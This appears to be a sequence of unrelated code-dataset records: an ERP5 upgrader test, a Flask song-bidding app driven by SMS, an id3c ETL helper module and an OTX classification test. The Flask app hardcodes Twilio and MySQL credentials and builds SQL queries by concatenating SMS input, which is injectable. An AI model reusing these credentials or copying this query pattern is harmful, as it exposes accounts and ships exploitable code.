'integrity_verification_script_id_list',\n 'catalog_filter_dict',\n 'update_role_portal_type_list',\n 'portal_type_property_sheet_list',\n 'erp5_site_property_dict',\n 'upgrade_object_class_list',\n 'recatalog',\n 'alarm_tool_configuration_list'\n )\n signature = self.portal.ERP5Site_getUpgraderSignature()\n self.assertEqual(sorted(signature_key_list), sorted(signature.keys()))\n\n def test_StandardUpgraderSignature(self):\n \"\"\" Test default behaviours provided by default ERP5Site_getUpgraderSignature\n \"\"\"\n signature = self.portal.ERP5Site_getUpgraderSignature()\n # By default we do not recatalog the instance\n self.assertEqual(signature['recatalog'], False)\n\n # By default we do not upgrade manually the workflow\n self.assertEqual(signature['workflow_chain_dict'], None)\n\n # By Default we do not upgrade Catalog Filters\n self.assertEqual(signature['catalog_filter_dict'], None)\n\n # By Default there is no extra properties to set.\n self.assertEqual(signature['erp5_site_property_dict'], {})\n\n # Do not enable alarms by default\n self.assertEqual(signature['alarm_tool_configuration_list'], ())\n\n # By default we upgrade software, products, bt5 and so on.\n self.assertTrue(signature['alarm_dict'][\"bt5_upgrader\"])\n self.assertTrue(signature['alarm_dict'][\"finalize_upgrader\"])\n\n # By default there is nothing to fix on skin Selection.\n # (rafael) Is it really necessary?\n self.assertFalse(self.portal.ERP5Site_setupUpgraderSkinSelection())\n\n def testUpgradeObjectWorkflowState(self):\n \"\"\"\n Create a test to ERP5Site_upgradeObjectList which aims to update\n Objects which are in bad workflow state or have a bad property.\n \n Signature API:\n\n { BUSINESS_TEMPLATE_TITLE : (\n\t (OBJECT_PATH,\n\t SCRIPT TO COLLECT INFORMATION,\n RETURN EXPECTED THAT INDICATES THE OBJECT IS BROKEN, \n\t\t\t SCRIPT USED TO FIX ),\n\t ),\n }\n \"\"\"\n signature_code = {'erp5_core':( ('portal_categories/%s' % self.upgrade_object_test_id,\n 'getValidationState', \n 'embedded', \n 'publish'),)}\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n self.assertEqual(self.portal.ERP5Site_upgradeObjectList(), [])\n test_object = self.portal.portal_categories.newContent(id=self.upgrade_object_test_id,\n portal_type=\"Base Category\")\n self.assertEqual(test_object.getValidationState(), 'embedded')\n self.assertNotEquals(self.portal.ERP5Site_upgradeObjectList(), [])\n self.assertNotEquals(self.portal.ERP5Site_upgradeObjectList(upgrade=\"1\"), [])\n self.assertEqual(test_object.getValidationState(), 'published')\n\n def testUpgradeObjectClass(self):\n \"\"\"\n Verify if all objects from one class are migrated to\n another class.\n \"\"\"\n to_class_as_string = 'Products.ERP5Type.Document.Folder.Folder'\n signature_code = ( ('portal_gadgets', \n 'ERP5Site_testUpgradeObjectClass',\n to_class_as_string, \n 'Products.ERP5Type.Document.Gadget.Gadget', \n 'ERP5Site_testUpgradeObjectClass'), )\n\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n # Nothing to upgrade\n self.assertEqual(self.portal.ERP5Site_upgradeObjectClass(), [])\n\n # Create one broken object\n gadget = self.portal.portal_gadgets.newContent(portal_type=\"Gadget\", \n id=self.upgrade_object_test_id)\n self.tic()\n\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n \"test_upgradeObject\", 'x', 'return [1]')\n test_script = self.getPortal().portal_skins.custom.test_upgradeObject\n self.portal.portal_gadgets.upgradeObjectClass(\n test_script,\n gadget.__class__,\n to_class_as_string,\n test_script)\n\n self.commit()\n self.assertNotEquals(self.portal.ERP5Site_upgradeObjectClass(), [])\n self.assertEqual(self.portal.ERP5Site_upgradeObjectClass(upgrade=1),\n [(gadget.getRelativeUrl(), 'ERP5 Gadget')])\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradeObjectClass(), [])\n\n def test_UpgradeGlobalPropertyList(self):\n \"\"\"\n Verify if the upgrade is needed\n \"\"\"\n if getattr(self.portal, 'erp5_site_global_id', None) is not None:\n self.portal._updateProperty('erp5_site_global_id', \"SOME_KEY\")\n\n signature_code = {'erp5_site_global_id': self.upgrade_object_test_id}\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n self.assertEqual(self.portal.ERP5Site_upgradeGlobalPropertyList(), \n [\"Upgrade Required for Global Properties.\"])\n\n self.assertEqual([\"Upgrade Executed for Global Properties (erp5_site_global_id).\"], \n self.portal.ERP5Site_upgradeGlobalPropertyList(upgrade=1))\n\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradeGlobalPropertyList(), [])\n self.assertEqual(getattr(self.portal, 'erp5_site_global_id', None),\n self.upgrade_object_test_id)\n\n def test_UpgradeWorkflowChain(self):\n \"\"\"\n Upgrade the workflow chain if required.\n \"\"\"\n workflow_tool = self.portal.portal_workflow\n workflow_dict = workflow_tool.getWorkflowChainDict()\n signature_code = workflow_dict\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(), [])\n\n original_person_chain = workflow_dict[\"chain_Person\"]\n # Modify installed workflow chain.\n workflow_dict[\"chain_Person\"] = ''\n workflow_tool.manage_changeWorkflows(default_chain = '', \n props = workflow_dict)\n self.assertEqual(workflow_tool.getWorkflowChainDict()[\"chain_Person\"],\n \"\")\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(),\n [\"Upgrade Required for Workflow Chain.\"])\n\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(upgrade=1),\n [\"Upgrade Executed for Workflow Chain.\"])\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradeWorkflowChain(),[])\n self.assertEqual(workflow_tool.getWorkflowChainDict()[\"chain_Person\"],\n original_person_chain)\n\n def test_RunVerificationScriptDontRaise(self):\n \"\"\" Test if the script ERP5Site_runVerificationScript is \n bullet of proof, and always return a result.\n \"\"\"\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_raise', \"\",\n \"raise ValueError('Error')\")\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_return', \"\",\n \"return ['A']\")\n\n failure = self.portal.ERP5Site_runVerificationScript(\"ERP5Site_raise\")\n self.assertTrue(\"Script ERP5Site_raise fail to run\" in failure,\n \"'Script ERP5Site_raise fail to run not' in %s\" % failure)\n self.assertEqual('ERP5Site_return : \\n - A ',\n self.portal.ERP5Site_runVerificationScript(\"ERP5Site_return\"))\n\n def test_UpgradePortalTypePropertySheet(self):\n \"\"\"\n Test for Upgrate Portal Type Property Sheet script.\n \"\"\"\n signature_code = (('Account', [\"Person\"]), )\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_getUpgraderSignature', \"item=None\",\n \"return \" + str(signature_code))\n self.commit()\n self.assertEqual(self.portal.ERP5Site_getUpgraderSignature(), signature_code)\n self.assertEqual(self.portal.ERP5Site_upgradePortalTypePropertySheet(),\n [\"Person doesn't has Account associated.\"])\n self.assertEqual(self.portal.ERP5Site_upgradePortalTypePropertySheet(upgrade=1),\n [\"Associate PropertySheet Account into Portal Type Person.\"])\n self.tic()\n self.assertEqual(self.portal.ERP5Site_upgradePortalTypePropertySheet(), [])\n\n\n def test_recreateActivities(self):\n \"\"\"\n The activities should be recreated after upgrade products.\n \"\"\"\n object_to_test = self.portal.portal_simulation\n createZODBPythonScript(self.getPortal().portal_skins.custom,\n 'ERP5Site_testRecreateActivityScript', \"\",\n \"context.manage_addProperty('custom_property_without_meaning', 'I was there', 'string')\")\n\n self.commit()\n object_to_test.activate().ERP5Site_testRecreateActivityScript()\n\n self.commit()\n # Verify if the final activity is created.\n self.assertTrue(object_to_test.hasActivity(method_id=\"ERP5Site_testRecreateActivityScript\"))\n self.portal.portal_activities.activate().ERP5Site_clearActivities()\n self.commit()\n self.assertTrue(object_to_test.hasActivity(method_id=\"ERP5Site_testRecreateActivityScript\"))\n self.assertTrue(self.portal.portal_activities.hasActivity(method_id='ERP5Site_clearActivities'))\n self.tic()\n self.assertFalse(object_to_test.hasActivity(method_id=\"ERP5Site_testRecreateActivityScript\"))\n self.assertFalse(self.portal.portal_activities.hasActivity(method_id='ERP5Site_clearActivities'))\n self.assertEqual(object_to_test.getProperty('custom_property_without_meaning'),\n 'I was there')\n","sub_path":"bt5/erp5_upgrader/TestTemplateItem/portal_components/test.erp5.testLiveUpgrader.py","file_name":"test.erp5.testLiveUpgrader.py","file_ext":"py","file_size_in_byte":14492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"227184062","text":"import requests\nfrom flask import Flask,render_template,request,url_for\nimport json\nimport time\nimport mysql.connector\n\nfrom twilio.rest import Client\nfrom twilio.twiml.messaging_response import MessagingResponse\n\nfrom libsoundtouch import soundtouch_device\nfrom libsoundtouch.utils import Source, Type\n\napp = Flask(__name__)\n\nsongBeingPlayed = 0\nsongPlayedName = \"test\"\n\ncurrent_volume = 50\n\n# Volume up\n# @app.route(\"/volumeUp\", methods=['POST'])\n# def volume_up():\n# \tnew_volume = current_volume + 20\n# \tchange_volume(new_volume)\n# \tcurrent_volume = new_volume\n#\n# # Volume down\n# @app.route(\"/volumeDown\", methods=['POST'])\n# def volume_down():\n# new_volume = current_volume - 20\n# change_volume(new_volume)\n# current_volume = new_volume\n\n@app.route(\"/\")\ndef index():\n\tstartDj()\n\treturn render_template(\"index.html\")\n\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_ahoy_reply():\n\tmobile_no = request.values.get('From',None)\n\tbody = request.values.get('Body', None)\n\tsongId = body.split(\" \")[0]\n\tbidAmt = body.split(\" \")[1]\n\tres = update(mobile_no,bidAmt,songId)\n\tresp = MessagingResponse()\n\tif res :\n\t\tsend_sms(mobile_no,\"Thank you for your bid!\")\n\telse :\n\t\tsend_sms(mobile_no,\"Not Enough Credit!\")\n\n\ndef send_sms(number, messageBody):\n\tprint(number)\n\taccount_sid = 'ACf3d029ace0ab2f696f9f971c11696f91'\n\tauth_token = '14ac526739b259838c2f67becc772b6f'\n\tclient = Client(account_sid, auth_token)\n\n\tmessage = client.messages \\\n\t\t.create(\n\t\tbody=messageBody,\n\t\tfrom_='+12028312095',\n\t\tto=number\n\t)\n\tprint(message.sid)\n\n\ndef playSong1(track):\n\tdevice = soundtouch_device('192.168.1.168')\n\n\t#device.power_on()\n\ttrackToPlay = 'spotify:track:'+track\n\tprint(device.config.name)\n\tresp = device.play_media(Source.SPOTIFY, trackToPlay, '5yz9rfw854rb39vkepel9jh3f')\n\tprint(resp)\n\n\ndef getCurrentSongDuration():\n\tURL = \"http://192.168.1.168:8090/now_playing\"\n\tdevice = soundtouch_device('192.168.1.168')\n\tprint(device.status().content_item.source_account)\n\t# device.power_on()\n\tprint(device.config.name)\n\tresp = (device.status())\n\n\treturn resp.duration\n\n\ndef startDj():\n\ti = 0\n\twhile i < 6 :\n\t\ttrack = getNextSong()\n\t\tplaySong1(track)\n\t\ttimeToSleep = getCurrentSongDuration()\n\t\ttime.sleep(timeToSleep)\n\t\ti = i+1\n\n\n\ndef getNextSong():\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\n\tfirst_query = 'update songs set playsong = 1 where playsong = 3'\n\tcursor.execute(first_query)\n\tcnx.commit()\n\n\tquery = (\"select id, song_name, song_id from songs where playsong = 0 order by bid_amt desc limit 1;\")\n\tcursor.execute(query)\n\n\tfor (id) in cursor:\n\t\tid_temp = id[2]\n\t\tsongPlayedName = id[1]\n\t\tsongBeingPlayed = id_temp\n\t\tid_song = id[0]\n\n\tBASE_URL = 'update songs set playsong = 3 where id = '\n\n\tquery2 = (BASE_URL + str(id_song) +';')\n\tcursor.execute(query2)\n\tcnx.commit()\n\tcursor.close()\n\tcnx.close()\n\treturn id_temp\n\n@app.route(\"/pauseSong\", methods=['GET', 'POST'])\ndef pauseSong():\n\turl = \"http://192.168.1.168:8090/key\"\n\n\tpayload = \"PLAY_PAUSE\"\n\theaders = {\n\t\t'Content-Type': \"text/plain\",\n\t\t'User-Agent': \"PostmanRuntime/7.15.0\",\n\t\t'Accept': \"*/*\",\n\t\t'Cache-Control': \"no-cache\",\n\t\t'Postman-Token': \"5d036cf0-9330-42ef-8197-a224cfc4036a,12a332e9-be32-440d-9cf5-dce748f6b16e\",\n\t\t'Host': \"192.168.1.168:8090\",\n\t\t'accept-encoding': \"gzip, deflate\",\n\t\t'content-length': \"50\",\n\t\t'Connection': \"keep-alive\",\n\t\t'cache-control': \"no-cache\"\n\t}\n\n\tresponse = requests.request(\"POST\", url, data=payload, headers=headers)\n\tprint(response.text)\n\n\n@app.route(\"/current\", methods=['GET', 'POST'])\ndef currentSong():\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\tquery = (\"select id, song_name, song_id from songs where playsong = 3;\")\n\tcursor.execute(query)\n\tfor (id) in cursor:\n\t\tid_temp = id[2]\n\t\tsongPlayedName1= id[1]\n\t\tsongBeingPlayed = id_temp\n\t\tid_song = id[0]\n\t\treturn songPlayedName1\n\treturn songPlayedName\n\n\n@app.route(\"/bidData\", methods=['GET', 'POST'])\ndef currentBid():\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\tquery = (\"select song_name, bid_amt from songs order by bid_amt desc;\")\n\tcursor.execute(query)\n\n\tsongs = []\n\tbids = []\n\tfor (id) in cursor:\n\t\tsongs.append(id[0])\n\t\tbids.append(id[1])\n\n\tsong_json = []\n\tfor i in range(len(bids)):\n\t\tsong_json.append({'name': songs[i], 'bid': bids[i]})\n\n\n\tcursor.close()\n\tcnx.close()\n\treturn json.dumps(song_json)\n\n\ndef update(phoneNum, bid, song_id):\n\tph = phoneNum\n\tph = ph.replace(\"+\",\"\")\n\tcnx = mysql.connector.connect(user='be3bc40df921df', password='c7708685',\n\t\t\t\t\t\t\t\t host='us-cdbr-iron-east-04.cleardb.net',\n\t\t\t\t\t\t\t\t database='heroku_67d188873be555e')\n\n\tcursor = cnx.cursor()\n\tquery = (\"select id, credits from users where mob_num=\" + str(ph) + \";\")\n\tcursor.execute(query)\n\n\tfor (id) in cursor:\n\t\tuser_id = id[0]\n\t\tuser_bid = id[1]\n\t\tif int(bid) > int(id[1]):\n\t\t\treturn False\n\n\tquery4 = (\"select bid_amt from songs where id=\" + str(song_id) + \";\")\n\tcursor.execute(query4)\n\n\tsong_bid = 0\n\tfor (id) in cursor:\n\t\tsong_bid = id[0]\n\n\tquery2 = (\"update users set credits = \" + str(int(user_bid) - int(bid)) + \" where id = \" + str(user_id) + \";\")\n\tcursor.execute(query2)\n\tcnx.commit()\n\tquery3 = (\"update songs set bid_amt = \" + str(int(song_bid) + int(bid)) + \" where id =\" + str(song_id) + \";\")\n\tcursor.execute(query3)\n\n\tcnx.commit()\n\tcursor.close()\n\tcnx.close()\n\treturn True\n\n\n\n@app.route(\"/volume\", methods=['POST'])\ndef change_volume(desired_volume):\n url = \"http://192.168.1.168:8090/volume\"\n payload = \"%d\" % desired_volume\n headers = {\n 'Content-Type': \"text/plain\",\n 'User-Agent': \"PostmanRuntime/7.15.0\",\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"43ba8630-7c82-4265-bc13-0a1ce1e00b2e,625dc2c5-40fe-4e4b-83aa-8da21ec7e521\",\n 'Host': \"192.168.1.168:8090\",\n 'accept-encoding': \"gzip, deflate\",\n 'content-length': \"19\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n\n\nif __name__ == '__main__':\n\tapp.run(host=\"127.0.0.1\",port=8080,debug=True)","sub_path":"Deploying ML Flask App to GCP/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"407791106","text":"\"\"\"\nRun ETL routines\n\"\"\"\nimport click\nimport logging\nfrom math import ceil\nfrom typing import Any, Optional\nfrom id3c.db.session import DatabaseSession\nfrom id3c.db.datatypes import Json\nfrom id3c.cli import cli\nfrom id3c.db.types import MinimalSampleRecord\n\n\nLOG = logging.getLogger(__name__)\n\n\n@cli.group(\"etl\", help = __doc__)\ndef etl():\n pass\n\n\n# Load all ETL subcommands.\n__all__ = [\n \"enrollments\",\n \"manifest\",\n \"presence_absence\",\n \"kit\",\n \"consensus_genome\",\n \"redcap_det\",\n \"fhir\",\n]\n\ndef find_or_create_site(db: DatabaseSession, identifier: str, details: dict) -> Any:\n \"\"\"\n Select encounter site by *identifier*, or insert it if it doesn't exist.\n \"\"\"\n LOG.debug(f\"Looking up site «{identifier}»\")\n\n site = db.fetch_row(\"\"\"\n select site_id as id, identifier\n from warehouse.site\n where identifier = %s\n \"\"\", (identifier,))\n\n if site:\n LOG.info(f\"Found site {site.id} «{site.identifier}»\")\n else:\n LOG.debug(f\"Site «{identifier}» not found, adding\")\n\n data = {\n \"identifier\": identifier,\n \"details\": Json(details),\n }\n\n site = db.fetch_row(\"\"\"\n insert into warehouse.site (identifier, details)\n values (%(identifier)s, %(details)s)\n returning site_id as id, identifier\n \"\"\", data)\n\n LOG.info(f\"Created site {site.id} «{site.identifier}»\")\n\n return site\n\n\ndef upsert_individual(db: DatabaseSession, identifier: str, sex: str = None) -> Any:\n \"\"\"\n Upsert individual by their *identifier*.\n \"\"\"\n LOG.debug(f\"Upserting individual «{identifier}»\")\n\n data = {\n \"identifier\": identifier,\n \"sex\": sex,\n }\n\n individual = db.fetch_row(\"\"\"\n insert into warehouse.individual (identifier, sex)\n values (%(identifier)s, %(sex)s)\n\n on conflict (identifier) do update\n set sex = excluded.sex\n\n returning individual_id as id, identifier\n \"\"\", data)\n\n assert individual.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted individual {individual.id} «{individual.identifier}»\")\n\n return individual\n\n\ndef upsert_encounter(db: DatabaseSession,\n identifier: str,\n encountered: str,\n individual_id: int,\n site_id: int,\n age: Optional[str],\n details: dict) -> Any:\n \"\"\"\n Upsert encounter by its *identifier*.\n \"\"\"\n LOG.debug(f\"Upserting encounter «{identifier}»\")\n\n data = {\n \"identifier\": identifier,\n \"encountered\": encountered,\n \"individual_id\": individual_id,\n \"site_id\": site_id,\n \"age\": age,\n \"details\": Json(details),\n }\n\n encounter = db.fetch_row(\"\"\"\n insert into warehouse.encounter (\n identifier,\n individual_id,\n site_id,\n encountered,\n age,\n details)\n values (\n %(identifier)s,\n %(individual_id)s,\n %(site_id)s,\n %(encountered)s::timestamp with time zone,\n %(age)s,\n %(details)s)\n\n on conflict (identifier) do update\n set individual_id = excluded.individual_id,\n site_id = excluded.site_id,\n encountered = excluded.encountered,\n age = excluded.age,\n details = excluded.details\n\n returning encounter_id as id, identifier\n \"\"\", data)\n\n assert encounter.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted encounter {encounter.id} «{encounter.identifier}»\")\n\n return encounter\n\n\ndef find_sample_by_id(db: DatabaseSession, sample_id: int) -> Any:\n \"\"\"\n Find sample by *sample_id* and return sample.\n \"\"\"\n LOG.debug(f\"Looking up sample «{sample_id}»\")\n\n sample = db.fetch_row(\"\"\"\n select sample_id as id, identifier, encounter_id\n from warehouse.sample\n where sample_id = %s\n for update\n \"\"\", (sample_id,))\n\n if not sample:\n LOG.error(f\"No sample with id «{sample_id}» found\")\n return None\n\n LOG.info(f\"Found sample {sample.id} «{sample.identifier}»\")\n return sample\n\n\ndef update_sample(db: DatabaseSession,\n sample,\n encounter_id: Optional[int]=None) -> Optional[MinimalSampleRecord]:\n \"\"\"\n Update sample's encounter_id.\n \"\"\"\n LOG.debug(f\"Updating sample {sample.id}, linked to encounter {encounter_id}\")\n\n if sample.encounter_id:\n assert sample.encounter_id == encounter_id, \\\n f\"Sample {sample.id} already linked to another encounter {sample.encounter_id}\"\n return None\n\n sample = db.fetch_row(\"\"\"\n update warehouse.sample\n set encounter_id = %s\n where sample_id = %s\n returning sample_id as id, identifier\n \"\"\", (encounter_id, sample.id))\n\n assert sample.id, \"Updating encounter_id affected no rows!\"\n\n LOG.info(f\"Updated sample {sample.id}\")\n\n return sample\n\n\ndef age(document: dict) -> Optional[str]:\n \"\"\"\n Given a *document*, retrieve age value and\n return as a string to fit the interval format.\n\n If no value is given for age, then will just return None.\n \"\"\"\n age = document.get(\"age\")\n if age is None:\n return None\n return f\"{float(age)} years\"\n\n\ndef age_to_delete(age: Optional[Any]) -> Optional[dict]:\n \"\"\"\n TODO: Delete this function once we remove age from details\n Given an *age*, return a dict containing its 'value' and a boolean for\n 'ninetyOrAbove'.\n Currently applys math.ceil() to age to match the age from Audere.\n This may change in the future as we push to report age in months for\n participants less than 1 year old.\n If no value is given for *age*, then will just retun None.\n \"\"\"\n if age is None:\n return None\n\n return {\n \"value\": min(ceil(float(age)), 90),\n \"ninetyOrAbove\": ceil(float(age)) >= 90\n }\n\n\ndef find_sample(db: DatabaseSession, identifier: str, for_update = True) -> Any:\n \"\"\"\n Find sample by *identifier* and return sample.\n \"\"\"\n LOG.debug(f\"Looking up sample «{identifier}»\")\n\n query_ending = \"\"\n\n if for_update:\n query_ending = \"for update\"\n\n sample = db.fetch_row(\"\"\"\n select sample_id as id, identifier, encounter_id\n from warehouse.sample\n where identifier = %s or\n collection_identifier = %s\n \"\"\" + query_ending, (identifier,identifier,))\n\n if not sample:\n LOG.info(f\"No sample with identifier «{identifier}» found\")\n return None\n\n LOG.info(f\"Found sample {sample.id} «{sample.identifier}»\")\n return sample\n\n\ndef find_location(db: DatabaseSession, scale: str, identifier: str) -> Any:\n \"\"\"\n Find a location by *scale* and *identifier*.\n \"\"\"\n LOG.debug(f\"Looking up location {(scale, identifier)}\")\n\n location = db.fetch_row(\"\"\"\n select location_id as id, scale, identifier, hierarchy\n from warehouse.location\n where (scale, identifier) = (%s, %s)\n \"\"\", (scale, identifier))\n\n if not location:\n LOG.error(f\"No location for {(scale, identifier)}\")\n return None\n\n LOG.info(f\"Found location {location.id} as {(scale, identifier)}\")\n return location\n\n\ndef upsert_location(db: DatabaseSession,\n scale: str,\n identifier: str,\n hierarchy: str) -> Any:\n \"\"\"\n Upserts a location by its *scale* and *identifier*.\n\n If *hierarchy* is None, it will be set to the location's\n `scale => identifier`. Otherwise, the location's `scale => identifier`\n will be appended to the *hierarchy*.\n\n On update, new hierarchy and existing hierarchy are concatenated, with\n new hierarchy taking precedence if there is overlap of keys.\n \"\"\"\n LOG.debug(f\"Upserting location {(scale, identifier)}\")\n\n # Always includes the new location's own scale => identifier in hierarchy\n location_hierarchy = f\"{scale} => {identifier}\".lower()\n if hierarchy is None:\n hierarchy = location_hierarchy\n else:\n hierarchy = hierarchy + \",\" + location_hierarchy\n\n location = db.fetch_row(\"\"\"\n insert into warehouse.location (scale, identifier, hierarchy)\n values (%s, %s, %s)\n\n on conflict (scale, identifier) do update\n set hierarchy = coalesce(location.hierarchy, '') || excluded.hierarchy\n\n returning location_id as id, scale, identifier, hierarchy\n \"\"\", (scale, identifier, hierarchy))\n\n assert location.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted location {location.id} as {(location.scale,location.identifier)}\")\n\n return location\n\n\ndef upsert_encounter_location(db: DatabaseSession,\n encounter_id: int,\n relation: str,\n location_id: int) -> Any:\n \"\"\"\n Upserts an encounter location by its *encounter_id* and *relation*.\n \"\"\"\n LOG.debug(f\"Upserting encounter {relation} location\")\n\n with db.cursor() as cursor:\n cursor.execute(\"\"\"\n insert into warehouse.encounter_location (encounter_id, relation, location_id)\n values (%s, %s, %s)\n on conflict (encounter_id, relation) do update\n set location_id = excluded.location_id\n \"\"\", (encounter_id, relation, location_id))\n\n assert cursor.rowcount == 1, \"Upsert affected no rows!\"\n\n\ndef upsert_presence_absence(db: DatabaseSession,\n identifier: str,\n sample_id: int,\n target_id: int,\n present: bool,\n details: dict) -> Any:\n \"\"\"\n Upsert presence_absence by its *identifier*.\n\n Confirmed with Samplify that their numeric identifier for each test is stable\n and persistent.\n \"\"\"\n LOG.debug(f\"Upserting presence_absence «{identifier}»\")\n\n data = {\n \"identifier\": identifier,\n \"sample_id\": sample_id,\n \"target_id\": target_id,\n \"present\": present,\n \"details\": Json(details)\n }\n\n presence_absence = db.fetch_row(\"\"\"\n insert into warehouse.presence_absence (\n identifier,\n sample_id,\n target_id,\n present,\n details)\n values (\n %(identifier)s,\n %(sample_id)s,\n %(target_id)s,\n %(present)s,\n %(details)s)\n\n on conflict (identifier) do update\n set sample_id = excluded.sample_id,\n target_id = excluded.target_id,\n present = excluded.present,\n details = coalesce(presence_absence.details, '{}') || excluded.details\n\n returning presence_absence_id as id, identifier\n \"\"\", data)\n\n assert presence_absence.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted presence_absence {presence_absence.id} \\\n «{presence_absence.identifier}»\")\n\n return presence_absence\n\n\ndef upsert_sample(db: DatabaseSession,\n collection_identifier: str,\n encounter_id: int,\n details: dict) -> Any:\n \"\"\"\n Upsert collected sample by its *collection_identifier*.\n\n The provided *details* are merged (at the top-level only) into\n the existing sample details, if any.\n \"\"\"\n LOG.debug(f\"Upserting sample collection «{collection_identifier}»\")\n\n data = {\n \"collection_identifier\": collection_identifier,\n \"encounter_id\": encounter_id,\n \"details\": Json(details),\n }\n\n sample = db.fetch_row(\"\"\"\n insert into warehouse.sample (collection_identifier, encounter_id, details)\n values (%(collection_identifier)s, %(encounter_id)s, %(details)s)\n\n on conflict (collection_identifier) do update\n set encounter_id = excluded.encounter_id,\n details = coalesce(sample.details, '{}') || %(details)s\n\n returning sample_id as id, identifier, collection_identifier, encounter_id\n \"\"\", data)\n\n assert sample.id, \"Upsert affected no rows!\"\n\n LOG.info(f\"Upserted sample {sample.id} with collection identifier «{sample.collection_identifier}»\")\n\n return sample\n\n\ndef find_or_create_target(db: DatabaseSession, identifier: str, control: bool) -> Any:\n \"\"\"\n Select presence_absence test target by *identifier*, or insert it if it doesn't exist.\n \"\"\"\n LOG.debug(f\"Looking up target «{identifier}»\")\n\n target = db.fetch_row(\"\"\"\n select target_id as id, identifier\n from warehouse.target\n where identifier = %s\n \"\"\", (identifier,))\n\n if target:\n LOG.info(f\"Found target {target.id} «{target.identifier}»\")\n else:\n LOG.debug(f\"Target «{identifier}» not found, adding\")\n\n data = {\n \"identifier\": identifier,\n \"control\": control\n }\n\n target = db.fetch_row(\"\"\"\n insert into warehouse.target (identifier, control)\n values (%(identifier)s, %(control)s)\n returning target_id as id, identifier\n \"\"\", data)\n\n LOG.info(f\"Created target {target.id} «{target.identifier}»\")\n\n return target\n\n\nclass SampleNotFoundError(ValueError):\n \"\"\"\n Raised when a function is unable to find an existing sample with the given\n identifier.\n \"\"\"\n pass\n\nclass UnknownSiteError(ValueError):\n \"\"\"\n Raised by :function:`site_identifier` if its provided *site_nickname*\n is not among the set of expected values.\n \"\"\"\n pass\n\nclass UnknownEthnicGroupError(ValueError):\n \"\"\"\n Raised by :function:`hispanic_latino` if its provided *ethnic_group* is not\n among the set of expected values.\n \"\"\"\n pass\n\nclass UnknownFluShotResponseError(ValueError):\n \"\"\"\n Raised by :function:`flu_shot` if its provided *flu_shot_reponse* is not\n among the set of expected values.\n \"\"\"\n pass\n\n\nfrom . import *\n","sub_path":"lib/id3c/cli/command/etl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"544754059","text":"import pytest\n\nfrom otx.mpa.cls.semisl.stage import SemiSLClsStage\nfrom otx.mpa.cls.stage import ClsStage\nfrom tests.test_suite.e2e_test_system import e2e_pytest_unit\nfrom tests.unit.algorithms.classification.test_helper import setup_mpa_task_parameters\n\n\nclass TestOTXSemiSLClsStage:\n @pytest.fixture(autouse=True)\n def setup(self) -> None:\n self.model_cfg, self.data_cfg, recipie_cfg = setup_mpa_task_parameters(\n task_type=\"semisl\", create_val=True, create_test=True\n )\n self.stage = SemiSLClsStage(name=\"\", mode=\"train\", config=recipie_cfg, common_cfg=None, index=0)\n\n @e2e_pytest_unit\n def test_configure_data(self, mocker):\n mock_ul_dataloader = mocker.patch.object(ClsStage, \"configure_unlabeled_dataloader\")\n fake_semisl_data_cfg = {\"data\": {\"unlabeled\": {\"otx_dataset\": \"foo\"}}}\n self.stage.configure_data(self.stage.cfg, fake_semisl_data_cfg, True)\n\n mock_ul_dataloader.assert_called_once()\n\n @e2e_pytest_unit\n def test_configure_task(self, mocker):\n self.stage.cfg.merge_from_dict(self.model_cfg)\n mock_cfg_classes = mocker.patch.object(ClsStage, \"configure_classes\")\n self.stage.configure_task(self.stage.cfg, True)\n\n assert \"task_adapt\" not in self.stage.cfg.model\n 